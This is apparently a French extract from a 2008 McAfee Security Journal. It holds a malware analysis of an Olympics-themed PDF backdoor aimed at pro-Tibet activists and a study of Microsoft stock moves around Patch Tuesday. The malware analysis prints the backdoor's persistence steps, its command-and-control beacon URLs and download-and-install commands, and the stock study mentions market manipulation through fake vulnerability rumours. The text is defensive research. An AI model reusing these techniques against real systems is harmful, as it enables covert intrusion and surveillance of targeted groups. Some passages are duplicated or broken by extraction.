Des militants appartenant à des groupes protibétains ont reçu des e-mails contenant une pièce jointe au format CHM (fichier d'aide compilé), PDF, PPT, XLS ou DOC traitant de la situation au Tibet, de la Chine en général ou des Jeux. Tous ces messages semblaient avoir été envoyés par une personne ou une organisation digne de confiance. Selon toute vraisemblance, ces utilisateurs étaient habitués à recevoir des documents de ce type de leurs partisans et ne s'en sont pas toujours méfiés. Il s'agissait de pièces jointes malveillantes : leurs auteurs utilisaient diverses vulnérabilités associées aux fichiers d'aide compilés HTML de Microsoft, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint ou Microsoft Word pour injecter et exécuter silencieusement des fichiers exécutables incorporés. A ce stade, le public cible était relativement restreint, mais la couverture médiatique des manifestations en faveur du Tibet a servi de détonateur.

Par la suite, certains sites web légitimes de défense de la cause tibétaine ont été piratés afin d'incorporer le cheval de Troie Fribet1, qui peut se télécharger sur les ordinateurs des visiteurs en exploitant des vulnérabilités des navigateurs web.

A ce stade, le public visé par l'attaque s'est élargi. Initialement dirigée contre des organisations ciblées et leurs sympathisants, l'attaque s'est étendue à tous les internautes intéressés par la situation tibétaine. Une fois encore, l'attention des médias a contribué à élargir la population de victimes potentielles.

Ensuite, les auteurs de logiciels malveillants ont exploité les Jeux Olympiques eux-mêmes pour lancer des attaques d'ingénierie sociale sous la forme du rootkit pro-Tibet2. Cette série de fichiers malveillants se dissimulait derrière une vidéo tournant en ridicule un gymnaste chinois. Pendant l'exécution du dessin animé, plusieurs fichiers malveillants étaient silencieusement injectés et un rootkit installé sur l'ordinateur cible afin de les dissimuler.

Le choix des Jeux Olympiques comme thème d'attaque d'ingénierie sociale a permis aux auteurs de logiciels malveillants de prendre pour cible de nombreux passionnés de sports ainsi que les personnes précédemment visées en raison de leur intérêt dans le conflit sino-tibétain.

Le choix des Jeux Olympiques comme thème d'attaque d'ingénierie sociale a permis aux auteurs de logiciels malveillants de prendre pour cible de nombreux passionnés de sports ainsi que les personnes précédemment visées en raison de leur intérêt dans le conflit sino-tibétain.

Page 18: MacAfee Security Journal Fr

Figure 1 : Les sympathisants de la cause tibétaine ont récemment reçu ce fichier en apparence légitime sous la forme d'une pièce jointe à un e-mail.

18 McAFEE SECURITY JOURNAL

Etude de cas : attaque de logiciel malveillant sur fond de Jeux OlympiquesNous avons récemment reçu le fichier PDF, declaration_olympic_games_eng.pdf, envoyé initialement à un groupe pro-tibétain (voir figure 1). Ce document semblait inoffensif dans la mesure où, à l'ouverture de l'application, le texte apparaissait sans bloquer l'application ni provoquer d'événements inhabituels. La plupart des utilisateurs n'ont dès lors pas suspecté la présence d'une quelconque activité malveillante. Toutefois, en arrière-plan, certains fichiers malveillants étaient silencieusement créés sur les ordinateurs des victimes. Examinons à présent le fonctionnement de l'attaque.

En fait, le fichier declaration_olympic_games_eng.pdf est un fichier PDF vide qui exploite une vulnérabilité d'Acrobat pour injecter et exécuter la première partie d'un package malveillant. Ce fichier exécutable malveillant (détecté sous le nom de BackDoor-DOW3) est incorporé sous une forme chiffrée à l'emplacement illustré dans l'éditeur hexadécimal de la figure 2 (page suivante).

La figure 3 (page suivante) montre les premiers octets du fichier incorporé après qu'il a été déchiffré.

Le fichier exécutable dépose le fichier PDF légitime, book.pdf, qui s'affiche lors de l'exécution du premier fichier. Le fichier injecteur recherche le processus AcroRd32.exe dans la liste des processus

actifs, localise le répertoire d'installation d'Acrobat puis ouvre le fichier book.pdf. La figure 4 (page suivante) montre le code contenu dans le fichier injecteur responsable de l'action.

Le logiciel malveillant injecte également un autre fichier exécutable, book.exe, qui se copie sous %ALLUSERSPROFILE%\Application Data\msmsgs.exe et crée un nouveau service Windows4. Ce nouveau service porte le nom de « Logical Disk Manager Service » (Service du gestionnaire de disques logiques) et garantit l'exécution automatique du cheval de Troie au démarrage de Windows.

Le logiciel malveillant dispose même d'un « plan de secours » pour intercepter le processus de démarrage : s'il n'arrive pas à créer le service, il ajoute une nouvelle entrée de Registre, Windows Media Player, qui pointe vers msmsgs.exe. Windows Media Player est ajouté à la clé de démarrage suivante dans le Registre5 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Le cheval de Troie crée également deux fichiers contenant certaines données chiffrées :

C:\WINDOWS\jwiev.log.bak

C:\WINDOWS\clocks.avi.bak

Sponsor's declaration of responsibility

at the 2008 Beijing Olympic Games

WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares:

forth in the Olympic Charter, and

We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and

for hosting the Olympic Games and recognize the worldwid concerns expressed about

IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by:

Chinese contacts and to publicly report on our efforts to do so, and

THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and

this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and

DECLARED BY

Name/Title Date

Page 19: MacAfee Security Journal Fr

AUTOMNE 2008 19

Pour terminer, book.exe effectue un nettoyage en créant un fichier de commandes qui se supprime et s'arrête automatiquement. A ce stade, c'est le fichier msmsgs.exe qui prend les commandes.

Msmsgs.exe injecte temporairement un autre fichier à l'emplacement suivant : C:\Program Files\WindowsUpdate\Windows Installer.exe. Juste avant d'être supprimé, Windows Installer.exe injecte deux copies d'un fichier DLL dans :

C:\Documents and Settings\All Users\DRM\drmv021.lic

C:\Documents and Settings\All Users\DRM\avp01.lic

Le logiciel malveillant s'injecte dans svchost.exe pour dissimuler son activité. Il exécute une nouvelle instance de svchost.exe (le processus système légitime6), alloue un bloc de mémoire dans l'espace d'adressage de ce nouveau processus, écrit une copie de lui-même dans l'espace d'adressage virtuel de svchost.exe (à l'adresse 0x400000), et exécute le code malveillant en créant une thread distante.

Figure 2 : Ce fichier PDF malveillant contenait une copie chiffrée du logiciel malveillant BackDoor-DOW.

Figure 3 : Version déchiffrée du cheval de Troie BackDoor-DOW.

Le code malveillant injecté dans svchost.exe appelle la fonction workFunc() à partir du fichier avp01.lic, laquelle se connecte à un serveur distant et envoie trois requêtes :

http://www1.palms[supprimé]/ld/v2/loginv2.asp?hi=2wsdf351&x=0720080510150323662070000000&y=192.168.1.122&t1=ne

http://www1.palms[supprimé]/ld/v2/votev2.asp?a=7351ws2&s=0720080510150323662070000000&t1=ne

http://www1.palms[supprimé]/ld/v2/logoutv2.asp?p=s9wlf1&s=0720080510150323662070000000&t1=ne

Les paramètres x et y peuvent varier. La valeur de x est obtenue en concaténant « 07 » ainsi que la date (10/05/2008) et l'heure (15:03:23) exactes de création du fichier clocks.avi.bak puis en ajoutant la chaîne codée en dur « 662070000000 ». La valeur de y est l'adresse IP de l'ordinateur de la victime.

Figure 4 : Le logiciel malveillant recherche Acrobat Reader (AcroRd32.exe) puis ouvre le fichier innocent book.pdf.

Page 20: MacAfee Security Journal Fr

20 McAFEE SECURITY JOURNAL

Les trois scripts côté serveur loginv2.asp, votev2.asp et logoutv2.asp informent l'auteur de l'attaque qu'un nouvel ordinateur compromis est disponible afin de vérifier si une commande a été envoyée par le pirate ou d'arrêter le composant Backdoor. Pour lire la réponse envoyée après la connexion à l'un des scripts côté serveur, le cheval de Troie crée une copie de la page web renvoyée dans le dossier suivant : C:\Program Files\InstallShield Installation Information\

Le nom du fichier représente une valeur aléatoire de six chiffres et, une fois lu, le fichier est supprimé. loginv2.asp et logoutv2.asp renvoient uniquement des pages web vides (avec des balises <html><head></head></html>). En revanche, votev2.asp renvoie soit du code signifiant approximativement « Le composant backdoor est prêt mais aucune action n'est nécessaire pour le moment » (@n4@300@), soit une commande similaire aux exemples suivants :

@n11@http://www1.palms[supprimé]/ld/v2/sy64.jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d302f7a58aeb1@

@n11@http://www1.palms[supprimé]/ld/v2/200764.jpg @% SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94ffd48c@.

Les deux commandes signifient approximativement « télécharger le fichier susmentionné avec l'extension .JPG et l'injecter dans le dossier %SysDir% de l'ordinateur de la victime à l'aide du nom du fichier exécutable fourni ». La dernière partie de la réponse est le hachage md5 du fichier en passe d'être téléchargé (et utilisé pour contrôler l'intégrité du fichier).

Tout au long du processus, les victimes ne se doutent pas un seul instant de ce qui se passe en arrière-plan. Pendant qu'ils lisent et complètent la déclaration envoyée par le fichier PDF malveillant, le composant backdoor est installé silencieusement sur leur ordinateur, dans l'attente des commandes qui seront envoyées par le pirate. A ce stade, il est possible de télécharger n'importe quel autre fichier malveillant sur l'ordinateur, dans la mesure où il est entièrement compromis.

Sites et logiciels malveillantsLes accroches dont usent les auteurs d'attaques d'ingénierie sociale ne se limitent pas aux événements sportifs. Depuis plusieurs mois, nous avons pu constater une augmentation des logiciels malveillants prétendument développés par des éditeurs de logiciels de sécurité. Ces programmes trompent les victimes en prétendant les aider. Comble de l'ironie, plusieurs variantes du cheval de Troie FakeAlert7 avertissent les victimes que leur ordinateur a été infecté et communiquent des informations (souvent des URL malveillantes) permettant de télécharger des outils « antispyware » qui sont en réalité des applications malveillantes.

Etant donné l'importance que revêtent les mises à jour des logiciels, il n'a pas fallu longtemps pour que des sites web malveillants commencent à imiter le site Windows Update légitime. Une méthode très élaborée utilisant des composants DLL a été récemment découverte. Liée à un pseudo-site Windows Update, elle empêchait Internet Explorer d'avertir les utilisateurs lorsqu'un serveur web distant utilisait un certificat non valide pour un site web sécurisé (HTTPS). Cette attaque avait pour but de dissimuler des fichiers malveillants sous le couvert de mises à jour Windows qui étaient téléchargées et exécutées par les victimes.

Cette tendance risque de prendre de l'ampleur au cours des mois à venir. Elle est inquiétante car la plupart des internautes font confiance aux éditeurs de logiciels de sécurité. Si cette confiance était entamée, les dommages seraient sans doute encore plus graves.

Cette tendance risque de prendre de l'ampleur au cours des mois à venir. Elle est inquiétante car la plupart des internautes font confiance aux éditeurs de logiciels de sécurité. Si cette confiance était entamée, les dommages seraient sans doute encore plus graves.

Page 21: MacAfee Security Journal Fr

AUTOMNE 2008 21

NOTES 1 Fribet, McAfee VIL — http://vil.nai.com/vil/content/v_144356.htm 2 « Is Malware Writing the Next Olympic Event? » (Le développement de logiciels

malveillants est-il le prochain événement olympique ?) Blog McAfee Avert Labs — http://www.avertlabs.com/research/blog/index.php/2008/04/14/ is-malware-writing-the-next-olympic-event/

3 « BackDoor-DOW », McAfee VIL — http://vil.nai.com/vil/content/v_144476.htm 4 « Services », Microsoft Developer Network — http://msdn.microsoft.com/en-us/

library/ms685141(VS.85).aspx 5 « Registre », Microsoft Developer Network — http://msdn.microsoft.com/en-us/

library/ms724871(VS.85).aspx 6 « Description de Svchost.exe dans Windows XP », Microsoft Help and Support

— http://support.microsoft.com/kb/314056/en-us

ConclusionLes événements sportifs sont souvent utilisés comme appâts dans les attaques d'ingénierie sociale. Il était dès lors prévisible que les développeurs de logiciels malveillants s'intéressent aux Jeux Olympiques de Pékin. Cet événement réunissait tous les ingrédients nécessaires à leur succès : des petites attaques ciblées ont pris de l'ampleur à mesure qu'augmentait le nombre de victimes potentielles intéressées par le sujet. L'expansion a été facilitée par les questions connexes : le problème du Tibet a conduit au relais de la flamme qui a, à son tour, mené aux Jeux eux-mêmes. Les médias jouent souvent un rôle majeur dans la popularité d'un événement. La couverture médiatique importante incite certaines victimes à aller au-devant de l'information ; ce faisant, elles tombent sur des sites web malveillants ou, plus fréquemment, des sites web légitimes compromis qui infectent silencieusement leurs visiteurs peu méfiants.

Ces attaques sont tellement évoluées que les victimes n'ont pratiquement jamais aucun soupçon. Comme l'a montré cette étude de cas, nous sommes confrontés à des menaces émanant non seulement d'expéditeurs inconnus et de pièces jointes dotées d'une extension .EXE, mais aussi de documents légitimes (Microsoft Word, Microsoft Excel, Microsoft PowerPoint, etc.) qui peuvent également héberger un composant malveillant. Le succès de ces attaques est dû en partie à Ia conception erronée voulant que les fichiers de données ne peuvent pas contenir de logiciels malveillants.

Certes, les internautes sont généralement plus conscients et mieux informés des ruses habituelles des pirates. Ces derniers se trouvent ainsi contraints à se tourner vers des techniques plus créatives et plus délétères pour réussir à tromper leurs victimes.

Elodie Grandjean travaille comme chercheur pour McAfee Avert Labs en France depuis janvier 2005. Elle possède plus de cinq années d'expérience dans le domaine de l'ingénierie inverse sur les plates-formes Windows. Spécialisée dans les techniques de protection contre l'ingénierie inverse, la décompression et le déchiffrement, Elodie Grandjean a également écrit pour le magazine français de sécurité informatique MISC (Multi-System & Internet Security Cookbook). Lorsqu'elle ne se consacre pas à l'analyse des logiciels malveillants ou à la programmation, elle surfe sur Internet, ou elle aime assister à des concerts ou savourer une bière belge entre amis.

7 FakeAlert-B, McAfee VIL — http://vil.nai.com/vil/content/v_139058.htm FakeAlert-C — http://vil.nai.com/vil/content/v_139219.htm FakeAlert-D — http://vil.nai.com/vil/content/v_140346.htm FakeAlert-D!56c05f7f — http://vil.nai.com/vil/content/v_142850.htm FakeAlert-H — http://vil.nai.com/vil/content/v_141377.htm FakeAlert-I — http://vil.nai.com/vil/content/v_141466.htm FakeAlert-G — http://vil.nai.com/vil/content/v_141163.htm FakeAlert-M — http://vil.nai.com/vil/content/v_142807.htm FakeAlert-Q — http://vil.nai.com/vil/content/v_143088.htm FakeAlert-R — http://vil.nai.com/vil/content/v_143102.htm FakeAlert-S.dll — http://vil.nai.com/vil/content/v_143110.htm FakeAlert-T — http://vil.nai.com/vil/content/v_143406.htm Generic FakeAlert.a — http://vil.nai.com/vil/content/v_143470.htm

Page 22: MacAfee Security Journal Fr

22 McAFEE SECURITY JOURNAL

Les vulnérabilités des marchés boursiersAnthony Bettini

La récente crise des crédits qui a secoué les marchés des actions et des produits dérivés a attiré l'attention sur les nombreuses facettes du secteur financier autres que les structures de contrôle réglementaire, les agences de notation financière, les fonds spéculatifs, le capital d'investissement, les fonds de pension et d'autres teneurs de marché.

En raison de cette attention médiatique constante, les spécialistes des sciences connexes (informatique, bioinformatique, etc.) commencent à s'intéresser de plus près à l'ingénierie financière.

Etant donné notre expérience dans le domaine de la recherche de vulnérabilités et le battage médiatique autour de la crise des crédits, il est normal de se pencher sur les vulnérabilités des marchés des actions et des produits dérivés. Lors de la conférence Black Hat 2007 aux Etats-Unis, Matasano Security s'est intéressé au protocole FIX (Financial Information eXchange), sur lequel repose le transfert des messages entre les gestionnaires de portefeuille exécutant des ordres pour le compte de leurs clients et les opérateurs en bourse1,2. Les recherches de Matasano portent sur diverses questions dont les éventuelles vulnérabilités du protocole FIX. S'il s'agit d'une approche intéressante sur les points faibles des protocoles financiers en termes de sécurité, notre article adopte, quant à lui, une démarche différente. Il s'attache plutôt à l'aspect financier et à l'ingénierie sociale qu'aux vulnérabilités.

Notre recherche s'intéresse aux questions suivantes :

Quelles sont les implications sur le cours de l'action de la publication mensuelle des correctifs Microsoft (Patch Tuesday) ?

Qu'en est-il du jour qui précède cette publication ?

Et du jour qui suit celle-ci (parfois désigné en anglais par le terme « Exploit Wednesday ») ?

Que se passe-t-il le jour de la publication des bulletins Microsoft Security Bulletin Advance Notification ?

Qu'en est-il des menaces émergentes ?

Les investisseurs sont-ils même conscients de ces événements ?

Existe-t-il actuellement des événements d'ingénierie sociale liés aux vulnérabilités et aux marchés des actions ? Des événements de ce type pourraient-ils se multiplier à l'avenir ?

Comme il s'agit d'un sujet d'étude très large, commençons par analyser uniquement les vulnérabilités des produits Microsoft. Dans un proche avenir, nous prévoyons de compléter nos recherches en y incluant des données relatives à d'autres éditeurs de logiciels, ainsi qu'une étude comparative sur l'impact économique des méthodes de distribution de correctifs (par exemple la publication mensuelle de Microsoft, la publication trimestrielle d'Oracle et les publications en fonction des besoins d'autres éditeurs).

L'hypothèseLe jour de diffusion des correctifs mensuels est le deuxième mardi de chaque mois (d'où le surnom de « Patch Tuesday »). C'est le seul jour du mois où Microsoft publie principalement les mises à jour fonctionnelles et les mises à jour de sécurité de Windows et de ses autres applications. Selon notre hypothèse, en ce jour précis, il existe une pression à la baisse sur l'action Microsoft (sigle de l'action : MSFT). Cette pression est vraisemblablement due à des communiqués de presse concernant les répercussions négatives des vulnérabilités de sécurité présentes dans les logiciels Microsoft. De la même façon, le cours a tendance à remonter le lendemain, le mercredi, lorsque les investisseurs réalisent que l'action a été survendue la veille.

Le jour de diffusion des correctifs fait-il l'objet d'une certaine forme de spéculation ?

Tout porte à le croire. En tout cas, il semble y avoir une corrélation entre les fluctuations du cours de l'action et le cycle de distribution des correctifs. A titre d'exemple, reportons-nous à la figure 1 (page suivante).

La première ligne, « Moyenne de l'année », représente notre moyenne de référence de la différence entre le cours de l'action Microsoft à l'ouverture des marchés, et ce cours à la clôture. La figure inclut une autre base de référence, à savoir la moyenne

Page 23: MacAfee Security Journal Fr

Figure 2 : Dans les transactions intrajournalières, les jours de notification avancée et les jours de publication des correctifs mensuels de Microsoft affichent systématiquement des moyennes de cours de l'action moins élevées que les autres jours de l'année.

Figure 3 : Le jour de publication des correctifs mensuels conserve sa position de cours le plus bas par rapport au cours intrajournalier moyen le plus bas de l'année.

AUTOMNE 2008 23

des « jours sans événements », qui exclut donc des événements tels que les jours de publication des correctifs mensuels et des bulletins de notification avancée. Il semble que, lorsque Microsoft publie un bulletin Security Bulletin Advance Notification, le cours connaît en moyenne une tendance à la baisse plus forte que d'habitude. De même, le jour de publication des correctifs mensuels enregistre également une tendance à la baisse plus marquée. Plus intéressant, le mercredi qui suit Patch Tuesday (également appelé « Exploit Wednesday »), la tendance est généralement haussière ou en tout cas positive à la clôture. Cela s'explique probablement par le fait que les investisseurs institutionnels ou les teneurs de marché estiment que l'action a été survendue la veille en raison de mauvaises nouvelles alors qu'en réalité, l'impact est négligeable sur la valeur de Microsoft en tant qu'investissement. Notez que cette tendance se vérifie régulièrement ces trois dernières années et toujours maintenant. Bien que la fluctuation du cours entre l'ouverture et la clôture soit la plus facile à comprendre, il est possible de noter cette même tendance dans la moyenne entre le cours à l'ouverture et le cours le plus élevé (cours du jour) et aussi dans la moyenne

Moyenne de l'année

FLUCTUATION DU COURS DE L'ACTIONMSFT ENTRE L'OUVERTURE ETLE COURS LE PLUS HAUT

Jours sans événements

Publication des bulletins MicrosoftSecurity Bulletin Advance NotificationJour de publication des correctifsmensuels (Patch Tuesday)

Tous les mardis

Tous les mardis sauf Patch Tuesday

Jour suivant Patch Tuesday

Tous les mercredis

Mercredi sauf celui qui suit Patch Tuesday

1,28 %

2008

1,34 %

0,93 %

0,92 %

1,35 %

1,50 %

1,52 %

1,25 %

1,17 %

0,97 %

2007

0,95 %

1,08 %

0,98 %

1,01 %

1,02 %

1,30 %

1,24 %

1,23 %

0,88 %

2006

0,88 %

0,58 %

0,67 %

0,92 %

0,99 %

0,70 %

0,92 %

0,95 %

Moyenne de l'année

FLUCTUATION DU COURS DE L'ACTIONMSFT ENTRE L'OUVERTURE ETLE COURS LE PLUS BAS

Jours sans événements

Publication des bulletins MicrosoftSecurity Bulletin Advance Notification

Jour de publication des correctifsmensuels (Patch Tuesday)

Tous les mardis

Tous les mardis sauf Patch Tuesday

Jour suivant Patch Tuesday

Tous les mercredis

Mercredi sauf celui qui suitPatch Tuesday

-1,35 %

2008

-1,39 %

-1,24 %

-1,58 %

-1,16 %

-1,01 %

-0,91 %

-1,39 %

-1,56 %

-0,89 %

2007

-0,90 %

-1,24 %

-0,99 %

-0,81 %

-0,76 %

-0,74 %

-0,78 %

-0,79 %

-0,64 %

2006

-0,64 %

-0,36 %

-0,93 %

-0,74 %

-0,68 %

-0,47 %

-0,51 %

-0,54 %

Fluctuation de l'action Microsoft entre le cours d'ouverture et le cours intrajournalier le plus élevé

Figure 1 : L'analyse de la fluctuation du cours de l'action Microsoft les jours clés montre une tendance régulière sur trois ans.

Moyenne de l'année

Jours sans événements

Publication des bulletins Microsoft Security Bulletin Advance Notification

Jour de publication des correctifs mensuels (Patch Tuesday)

Tous les mardis

Tous les mardis sauf Patch Tuesday

Jour suivant Patch Tuesday

Tous les mercredis

Mercredi sauf celui qui suit Patch Tuesday

-0,17 %

-0,20 %

-0,43 %

-0,45 %

0,16 %

0,37 %

0,49 %

-0,18 %

-0,40 %

0,06 %

0,07 %

-0,12 %

-0,29 %

0,05 %

0,15 %

0,21 %

0,44 %

0,51 %

0,08 %

0,08 %

-0,08 %

-0,11 %

-0,03 %

-0,01 %

0,27 %

0,29 %

0,26 %

FLUCTUATION DU COURS DE L'ACTIONMSFT ENTRE L'OUVERTURE ET LACLÔTURE DES MARCHÉS

2008 2007 2006

Fluctuation du cours de l'action Microsoft entre l'ouverture et la clôture Fluctuation de l'action Microsoft entre le cours d'ouverture et le cours intrajournalier le plus bas

entre le cours à l'ouverture et le cours le plus bas — même si, dans certains cas, elle est moins marquée.

La figure 2 montre qu'en général, les cours moyens intrajournaliers les plus élevés observés les jours de notification avancée et les jours de publication des correctifs mensuels sont plus bas que le cours moyen intrajournalier le plus élevé pour l'année. En outre, le cours moyen le plus élevé intrajournalier le lendemain de la publication mensuelle des correctifs est généralement plus élevé, ce qui indique une pression à la hausse plus élevée.

La figure 3 nous apprend qu'en général, le cours moyen intrajournalier le plus bas observé le jour de publication des correctifs est plus bas que le cours moyen intrajournalier le plus bas pour toute l'année. En revanche, en ce qui concerne le jour de publication des bulletins de notification avancée, les résultats sont plus mitigés. Il faut également noter que le cours moyen intrajournalier le plus bas du jour qui suit Patch Tuesday est généralement plus élevé que la moyenne de l'année, ce qui indique une pression à la hausse plus élevée.

Page 24: MacAfee Security Journal Fr

24 McAFEE SECURITY JOURNAL

Avant de poursuivre, un conseil de prudence à l'intention du spéculateur sur séance occasionnel ou du petit investisseur : ces fluctuations du cours sont relativement faibles et très limitées dans le temps. Avec un tel profil d'investissement, réaliser un bénéfice exigerait un gros investissement important et assez risqué en capital. Qui plus est, l'ensemble de données illustré ici est relativement restreint et donc inévitablement peu fiable. Par exemple, une année compte environ 260 jours d'ouverture des marchés, dont douze seulement correspondent aux jours de publication des correctifs mensuels. Néanmoins, en dépit d'un ensemble de données et de fluctuations limités, ce niveau de corrélation peut s'avérer utile pour les investisseurs institutionnels, même s'il doit être modélisé de la façon adéquate.

Examinons à présent les chiffres comparatifs des écarts de plus-value potentiels de la figure 4.

Elle montre qu'il semble possible de réaliser une petite plus-value en achetant des actions lorsque le cours s'approche de sa valeur moyenne intrajournalière la plus basse le jour de la publication des correctifs mensuels, et en les vendant le jour suivant, lorsque la valeur de l'action correspond à la moyenne intrajournalière la plus élevée. (L'effet serait naturellement atténué si cette pratique devait se généraliser.)

Les écarts de plus-value illustrés ici sont basés sur de véritables divulgations de vulnérabilités et sur l'hypothèse que les gens réagissent de façon prévisible à de tels événements. De la même façon que des rumeurs d'une OPA hostile peuvent se répercuter sur le cours d'une action, des rumeurs concernant plusieurs failles de sécurité graves et dangereuses pour les utilisateurs risquent d'avoir le même effet.

Sachant qu'à l'heure actuelle, de fausses rumeurs et divulgations de vulnérabilités circulent déjà via des listes de diffusion telles que Full Disclosure ou dans les salles de chat IRC, on peut envisager la possibilité d'orchestrer des événements de ce type grâce à l'ingénierie sociale dans le but de manipuler le marché et ses acteurs. Un tel scénario serait évidemment illégal, mais certains font peu de cas de la loi lorsqu'il y a l'espoir d'un profit à la clé. Par ailleurs, comme nous le verrons plus tard, toutes les attaques n'auraient pas nécessairement recours à l'ingénierie sociale. Certaines peuvent même être légales.

En tenant compte de l'hypothèse d'efficience des marchés (EMH, Efficient Market Hypothesis) et de l'hypothèse de marche aléatoire (RWH, Random Walk Hypothesis), il semble peu probable qu'il existe des scénarios de plus-value basés sur des prévisions à court terme du marché, et en tout cas qu'ils se reproduisent régulièrement3,4. A cet égard, il convient d'attirer l'attention des lecteurs sur le fait que « les performances passées ne laissent rien présumer des performances futures5.

Rôle du volume des actions en tant qu'indicateurDans une autre théorie, nous soutenions que le cycle des jours de publication des correctifs mensuels avait atténué l'impact qu'une presse négative pouvait avoir à l'époque où la diffusion des bulletins de sécurité n'était pas planifiée (avant la mi-octobre 2003). Un rapide coup d'œil à l'indicateur du volume d'actions semblent étayer cette théorie. (Reportez-vous à la figure 5 pour plus de détails.)

ÉCARTS

Entre le cours intrajournalier le plus bas de l'annéeet le cours intrajournalier le plus haut de l'année

Entre le cours intrajournalier le plus bas d'un jourde publication des correctifs mensuels (PatchTuesday) et le cours journalier le plus hautd'un même jour

Entre le cours intrajournalier le plus bas d'un jour depublication des correctifs mensuels (Patch Tuesday)et le cours journalier le plus haut du jour suivant

Cours intra-journalierle plus bas

2008

-1,35 %

-1,58 %

-1,58 %

Cours intra-journalier

le plus haut

1,28 %

0,92 %

1,52 %

Cours intra-journalierle plus bas

2007

-0,89 %

-0,99 %

-0,99 %

Cours intra-journalier

le plus haut

0,97 %

0,98 %

1,30 %

Cours intra-journalierle plus bas

2006

-0,64 %

-0,93 %

-0,93 %

Cours intra-journalier

le plus haut

0,88 %

0,67 %

0,70 %

Ecarts de plus-value potentiels

Figure 4 : L'achat d'actions le jour de publication des correctifs mensuels et leur vente le lendemain permet de réaliser un gain légitime, mais uniquement sur de gros volumes d'actions et avec un risque considérable.

Page 25: MacAfee Security Journal Fr

AUTOMNE 2008 25

Volume moyen, année complète

ÉCARTS DE VOLUME D'ACTIONS MSFT ECHANGÉES(PUBLICATIONS PLANIFIÉES)

Volume moyen, année complète(jours sans événements)

Volume moyen, jour de publication de correctifsmensuels (Patch Tuesday)

Volume moyen, un mardi autre quePatch Tuesday

Ecart moyen en volume d'actions MSFT échangées(entre Patch Tuesday et l'année complète)

66 612 503

2005

67 227 483

65 453 142

69 691 473

-1,74 %

66 793 733

2004

67 260 018

65 439 875

66 471 610

-2,03 %

62 506 437

2007

64 210 868

57 840 233

59 305 574

-7,47 %

67 074 387

2006

68 753 419

63 786 108

64 967 877

-4,90 %

84 898 274

2008

86 738 696

75 584 620

79 818 571

-10,97 %

Ecart moyen en volume d'actions MSFT échangées(entre Patch Tuesday et les jours sans événements)

Volume moyen pour l'indice ^IXIC année complèteVolume moyen pour l'indice ^IXIC,année complète (jours sans événements)

Volume moyen pour l'indice ^IXIC le jour depublication des correctifs mensuels (Patch Tuesday)

Volume moyen, pour l'indice ^IXIC un mardiautre que Patch Tuesday

-2,64 %

1 731 835 794

1 732 949 769

1 745 967 500

1 658 301 818

-2,71 %

1 769 480 040

1 768 463 981

1 759 816 667

1 752 408 182

-9,92 %

2 089 534 502

2 094 466 552

2 054 922 500

2 107 280 909

-7,22 %

1 926 859 522

1 935 854 692

2 009 946 667

1 813 831 818

-12,86 %

2 249 267 340

2 271 900 270

2 161 318 000

2 249 947 143

Ecart moyen en volume pour l'indice ^IXIC entre Patch Tuesday et l'année complète)

Ecart moyen en volume pour l'indice ^IXIC(entre Patch Tuesday et les jours sans événements)

Différence pour l'action MSFT entre PatchTuesday et un autre mardi

Différence pour l'indice ^IXIC entre PatchTuesday et un autre mardi

0,82 %

0,75 %

-6,08 %

5,29 %

-0,55 %

-0,49 %

-1,55 %

0,42 %

-1,66 %

-1,89 %

-2,47 %

-2,48 %

4,31 %

3,83 %

-1,82 %

10,81 %

-3,91 %

-4,87 %

-5,30 %

-3,94 %

Jours de publication de correctifs mensuels

Volume moyen, année complète (en actions échangées par jour)

ÉCARTS DE VOLUME D'ACTIONS MSFT ECHANGÉES (PUBLICATIONS NON PLANIFIÉES)

Volume moyen, année complète (jours sans événements)

Volume moyen, jour d'un bulletin non planifié

Différence moyenne en volume

Ecart moyen en volume par rapport aux jours sans événements

65 074 644

2003

64 512 432

70 017 743

7,60 %

8,53 %

76 903 678

2002

76 503 325

78 796 255

2,46 %

3,00 %

Volume de transactions sur l'action Microsoft, 2002–2003

Figure 6 : L'entrée en vigueur de la publication mensuelle planifiée des correctifs (Patch Tuesday) a apparemment convaincu les opérateurs boursiers qu'il n'existe pas d'avantage à retirer des seuls événements de diffusion de correctifs.

Figure 5 : Volume de transactions liées à l'action Microsoft avant le passage à la publication planifiée des correctifs mensuels

Page 26: MacAfee Security Journal Fr

26 McAFEE SECURITY JOURNAL

La figure 5 (page 25) montre que le jour de la publication d'un bulletin de sécurité non planifié en 2003 et en 2002, le volume moyen des actions échangées dépassait le volume moyen de l'année, respectivement de 7,6 % et de 2,46 % en moyenne. En les comparant uniquement aux jours sans événements pour le volume moyen de l'année complète, ce chiffre atteint respectivement 8,53 et 3 %.

Ces chiffres contrastent nettement avec les écarts de volume constatés lors des publications de correctifs mensuels, plus prévisibles, comme l'illustre la figure 6 (page 25). Nous avons également inclus une comparaison entre l'action Microsoft (MSFT) et l'indice NASDAQ Composite (^IXIC).

Cela sous-entendrait que le passage d'une publication non planifiée des bulletins (marche aléatoire) à une publication préplanifiée (le deuxième mardi du mois) a entraîné une diminution de l'intérêt des opérateurs en bourse pour les événements associés à Patch Tuesday.

Examinons à présent les données de comparaison concernant la publication des bulletins Microsoft Security Bulletin Advance Notification (figure 7 ci-dessous).

Pourquoi le volume moyen des transactions est-il plus faible le jour de cette notification avancée et le jour de publication des correctifs mensuels ? Selon notre hypothèse, la différence entre le volume moyen de l'année et le volume moyen enregistré le jour des correctifs mensuels peut s'expliquer en partie par des événements d'importance majeure affectant la moyenne annuelle (en vertu de la théorie des martingales) et qui, statistiquement, ont moins de chances de se produire le jour de la publication mensuelle compte tenu de sa faible fréquence (douze fois par an)6.

Communiqués de presse, réactions et implicationsLes implications de cette analyse sont intéressantes et nous espérons que cet article contribuera à stimuler la réalisation de nouvelles études concernant l'influence des vulnérabilités et des menaces sur les marchés des actions.

